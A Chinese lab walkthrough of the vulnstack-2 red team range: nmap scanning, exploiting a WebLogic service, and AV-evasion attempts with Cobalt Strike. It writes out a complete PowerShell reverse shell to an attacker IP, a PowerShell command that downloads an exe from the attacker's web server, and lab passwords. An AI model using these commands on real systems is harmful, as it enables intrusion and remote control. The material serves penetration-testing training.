#靶机#--红队靶机vulnstack-2

环境搭建

打开web虚拟机

用其他用户凭证登陆,密码过期修改密码就登陆成功了管理员账号密码:administrator/2wsx#EDC

de1ay/1qaz@WSX

管理员身份打开

C:\Oracle\Middleware\user_projects\domains\base_domain\bin\starWebLogic

nmap扫描

主机发现

nmap -sn -o hosts 192.168.111.0/24

看到 192.168.111.201192.168.111.80 为新增加的 ip

端口发现

nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports

192.168.111.80

发现有weblogic7001端口

192.168.111.201

nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 80_ports

web渗透

http://192.168.111.80:7001/console/login/LoginForm.jsp

查看weblogic默认登陆界面

反弹shell

使用狐狸工具箱中的工具

存在漏洞

反弹shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.128', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

成功反弹到 kali

执行命令 tasklist /svc,看到 360 的进程,应该是装了 360 杀毒软件

免杀

生成 cs 免杀木马

我们要对上线到 cs 的木马做免杀,用到 bypassAV 插件

GitHub - hack2fun/BypassAV: Cobalt Strike插件,用于快速生成免杀的可执行文件

在 cs 中导入它的 bypass.cna 文件

导入成功

用 bypassAV 生成免杀程序

多次生成发现生成不成功(放弃)

使用加壳,尝试

内网渗透

上线cs

kali 开启 python 的 web 服务

python3 -m http.server

获取的反弹 shell 中执行

powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.128:8000/artifact_x64_se.exe','c:\programdata\artifact_x64_se.exe')

将加壳后的exe文件上传到kali

上线cs

在kali上运行exe文件

成功上线cs

提权操作

横向渗透

域控发现

开发445端口

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值